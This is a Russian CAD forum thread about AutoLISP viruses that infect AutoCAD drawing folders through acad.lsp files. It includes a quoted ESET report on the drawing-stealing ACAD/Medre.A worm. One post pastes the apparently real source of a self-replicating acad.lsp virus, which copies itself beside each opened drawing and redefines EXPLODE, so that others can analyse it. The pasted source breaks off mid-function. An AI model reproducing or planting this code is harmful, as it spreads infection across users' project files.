[dextron3]

Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него!

Принцип действия:

При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает)

Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой

Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]

Тем, кому не прочитать тему:
http://forum.dwg.ru/showpost.php?p=218027&postcount=36
http://forum.dwg.ru/showpost.php?p=262114&postcount=52
http://forum.dwg.ru/showpost.php?p=796334&postcount=88
Для понимания механизма работы "вируса": http://forum.dwg.ru/showpost.php?p=1...&postcount=130
Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR

[oleg111]

А у меня такая проблема копируешь линию определеное количество раз ,ну допустем 8 так вот с последней скопированой линеей можно работать ,а с предыдущими ничего не зделать они заблокированы,но все это лечиться закрытием и последующим открытием файла,вопрос что это? спасибо за ответ

[KronSerg]

Попробуй:
1. Вид - Регенерировать всё
2. Правка - Выделить всё, после этого нажать "На передний план"

[MCAD]

Обнаружен вирус, похищавший чертежи AutoCAD.

Цитата:

Недавняя история с вирусом Flame, направленным на саботаж иранской ядерной программы, а также ставшие регулярными истории об очередной краже номеров кредитных карт с реквизитами владельцев - приучили нас к мысли, что в Интернет могут обворовать точно так же (а иногда и серьёзнее) как и в реальной жизни. Очередное подтверждение этой аксиомы: обнаружен специализированный вирус ACAD/Medre.A, распространяющийся вместе с инфицированными шаблонами AutoCAD и крадущий файлы с чертежами, которые тайно отсылает на ряд электронных почтовых ящиков в Китае. Вспышка вирусной атаки зафиксирована в Перу службой ESET Live Grid (облачной системой обнаружения угроз, использующей данные от пользователей ESET по всему миру). Специалисты компании обнаружили, что червь похищает файлы и отправляет их на учётные записи электронной почты в Китае. Чтобы прекратить передачу файлов, аналитики ESET связались с китайским интернет-провайдером Tencent, Национальным центром КНР по реагированию на вирусные угрозы, а также с компанией Autodesk, создателем AutoCAD. Специалисты ESET сообщают, что на момент обнаружения вируса были похищены десятки тысяч чертежей AutoCAD (принадлежащих в основном пользователям из Перу). Из-за масштабности вирусной атаки специалисты ESET обратились к владельцу домена qq.com, компании Tencent. Благодаря незамедлительным действиям ESET и Tencent учетные записи, использовавшиеся для передачи чертежей, были заблокированы, что предотвратило дальнейшую утечку данных. Помимо Перу, исследовательские группы ESET во всем мире обнаружили небольшое количество заражений в других латино-американских странах. Большое число заражений в Перу может быть связано с тем, что вредоносное ПО, модифицированное под файл AutoCAD, могло быть внедрено в компании, которые работают с государственными службами Перу. Это наводит на мысль, что основной мишенью создателей ACAD/Medre.A являлись именно эти организации. На данный момент ESET сотрудничает с местными властями, чтобы восстановить пораженный веб-сайт.

[sbi]

MCAD« ACAD / Medre . A представляет собой интересный случай промышленного шпионажа, вредоносная программа отслеживает появление новых чертежей на компьютерах зараженных пользователей и автоматически отправляет их на почту злоумышленникам, - комментирует Александр Матросов, директор Центра вирусных исследований и аналитики российского представительства ESET. - Такие хищения могут нанести серьезный материальный ущерб не только государственным учреждениям, но и просто владельцам интеллектуальной собственности, поскольку киберпреступники получают доступ к проектам еще до их запуска в производство. Они даже могут успеть получить патент на новый продукт до того, как создатели обратятся в патентное бюро».
вирус не причём!

[skif58]

Цитата:

Сообщение от sbi вирус не причём!

А логика?

[MCAD]

Цитата:

Сообщение от sbi вирус не причём!

Я, как всегда, выводы не делаю. Только информация.

Цитата:

Сообщение от skif58 А логика?

Вот именно!

[sbi]

skif58! и такую прогу можно напмсать на любом языке Причем здесь ВИРУС? Используя ошибки net.

[skif58]

sbi, я всегда думал, что ВИРУС - это прога.

[hwd]

Начиная с AutoCAD 2013 SP1 проблема с лисповыми вирусами становится легко решаемой. Более подробно здесь. Остаётся ждать SP1...

[Хмурый]

Цитата:

Сообщение от hwd Начиная с AutoCAD 2013 SP1 проблема с лисповыми вирусами становится легко решаемой. Более подробно здесь. Остаётся ждать SP1...

да он, SP1, уже вышел, но потом удалили. я даже скачать не успел.
http://forum.dwg.ru/showpost.php?p=962002&postcount=89

[hwd]

Цитата:

Сообщение от Хмурый да он, SP1, уже вышел, но потом удалили.

я в курсе, поэтому и пишу - ждать...

[Krovlaf]

Делаю работу для одной конторы. Там в каждой папке с чертежами dwg сидят acad.lsp Даже бесплатная Авира орет о вирусне и предлагает их удалить. У меня просьба к спецам лиспа посмотреть действительно ли там "вредоносный код" или кто то "просто хочет защитить свою информацию от изменения"? Код прилагаю:

Код:

[Выделить все]

 (defun
	  s::startup
		    (/	      old_cmd  path	dwgpath	 mnlpath
		     apppath  oldacad  newacad	nowdwg	 lspbj
		     wjm      wjm1     wjqm	wjqm1	 wz
		     ns1      ns2
		    )
  (setq
    old_cmd
     (getvar
       "cmdecho"
     )
  )
  (setvar
    "cmdecho"
    0
  )
  (setq
    path
     (findfile
       "base.dcl"
     )
  )
  (setq
    path
     (substr
       path
       1
       (-
	 (strlen
	   path
	 )
	 8
       )
     )
  )
  (setq
    mnlpath
     (getvar
       "menuname"
     )
  )
  (setq
    nowdwg
     (getvar
       "dwgname"
     )
  )
  (setq
    wjqm
     (findfile
       nowdwg
     )
  )
  (setq
    dwgpath
     (substr
       wjqm
       1
       (-
	 (strlen
	   wjqm
	 )
	 (strlen
	   nowdwg
	 )
       )
     )
  )
  (setq
    acadpath
     (findfile
       "acad.lsp"
     )
  )
  (setq
    acadpath
     (substr
       acadpath
       1
       (-
	 (strlen
	   acadpath
	 )
	 8
       )
     )
  )
  (setq
    ns1
	""
    ns2
	""
  )
  (setq
    lspbj
     0
  )
  (setq
    wjqm
     (strcat
       path
       "acad.lsp"
     )
  )
  (if
    (setq
      wjm
       (open
	 wjqm
	 "r"
       )
    )
     (progn
       (while
	 (setq
	   wz
	    (read-line
	      wjm
	    )
	 )
	  (setq
	    ns1
	     ns2
	  )
	  (setq
	    ns2
	     wz
	  )
       )
       (if
	 (>
	   (strlen
	     ns1
	   )
	   14
	 )
	  (if
	    (=
	      (substr
		ns1
		8
		7
	      )
	      "acadapp"
	    )
	     (setq
	       lspbj
		1
	     )
	  )
       )
       (close
	 wjm
       )
     )
  )
  (if
    (and
      (=
	acadpath
	dwgpath
      )
      (/=
	acadpath
	path
      )
    )
     (progn
       (setq
	 oldacad
	  (findfile
	    "acad.lsp"
	  )
       )
       (setq
	 newacad
	  (strcat
	    path
	    "acadapp.lsp"
	  )
       )
       (if
	 (=
	   lspbj
	   0
	 )
	  (progn
	    (setq
	      wjqm
	       (strcat
		 path
		 "acad.lsp"
	       )
	    )
	    (setq
	      wjm
	       (open
		 wjqm
		 "a"
	       )
	    )
	    (write-line
	      (strcat
		"(load
"
		(chr
		  34
		)
		"acadapp"
		(chr
		  34
		)
		")"
	      )
	      wjm
	    )
	    (write-line
	      "(princ)"
	      wjm
	    )
	    (close
	      wjm
	    )
	  )
       )
       (writeapp)
     )
     (progn
       (if
	 (/=
	   nowdwg
	   "Drawing.dwg"
	 )
	  (progn
	    (setq
	      oldacad
	       (findfile
		 "acadapp.lsp"
	       )
	    )
	    (setq
	      newacad
	       (strcat
		 dwgpath
		 "acad.lsp"
	       )
	    )
	    (writeapp)
	  )
       )
     )
  )
    (setvar
    "cmdecho"
    old_cmd
  )
  (princ)
)
(defun
	  writeapp
		  ()
  (if
    (setq
      wjm1
       (open
	 newacad
	 "w"
       )
    )
     (progn
       (setq
	 wjm
	  (open
	    oldacad
	    "r"
	  )
       )
       (while
	 (setq
	   wz
	    (read-line
	      wjm
	    )
	 )
	  (write-line
	    wz
	    wjm1
	  )
       )
       (close
	 wjm
       )
       (close
	 wjm1
       )
     )
  )
)
(defun
	  C:explode
		   (/
		    p
		    cont
		    old_cmd
		   )
  (setq

[Do$]

Код приведен не полностью, но уже видно, что идет переопределение команды EXPLODE. Кто-то пытался, наверное, защитить свои блоки от расчленения Хотя надо смотреть код полностью, может там еще какие-то сюрпризы.

[gomer]

Цитата:

Сообщение от Krovlaf У меня просьба к спецам лиспа посмотреть действительно ли там "вредоносный код" или кто то "просто хочет защитить свою информацию от изменения"?

да, это "вирус", 100%

[Krovlaf]

Цитата:

Код приведен не полностью

Сейчас еще раз перепроверил (для этого пришлось отключать уже NOD) код скопирован из файла и вставлен полностью (Ctrl+A)+(Ctrl+C)+(Ctrl+V)

Цитата:

да, это "вирус", 100%

А что кроме переопределения Explode обнаруживается "зловредного"?

[hwd]

Цитата:

Сообщение от Krovlaf А что кроме переопределения Explode обнаруживается "зловредного"?

А тебе не всё ли равно, или просто заняться нечем? Ответили ведь уже: выбрось это в ведро и не парь себе и другим мозг.

[Krovlaf]

Мне это, уважаемый легковозбудимый, для админов, которые похоже не ухом не рылом что это за "lsp" и чем оно плохо. Объяснить им развернуто почему надо почистить сеть. Потому как обленились и не хотят лишних телодвижений. Доходчиво? Водички выпей - успокоешься...

[Владимир.]

Цитата:

Сообщение от Krovlaf сейчас еще раз перепроверил

Всё равно, видно, что в конце "недописано"

[Krovlaf]

Кажется мне покурочили его и бросили. Не похож он на остальные подобные "вирусы" выложенные сдесь. По отзывам трудящихся никаких нареканий на работу Acada не было. "У нас всегда так было, значит так надо"! Хотя не факт что в других конторах использующих эти файлы все гладко. Чистить надо однозначно, как - описано выше, только надо знать что конкретно этот файл пытается сделать при запуске программы.

[gomer]

Krovlaf, что в командной строке автокада пишется при загрузке? Этот вирус размножает себя путем копирования содержимого в файлы аcad.lsp в папке с текущим чертежом... то, что там не дописано, возможно работа антивируса, который заблокировал файл при чтении-записи, но подранок еще живет, и размножается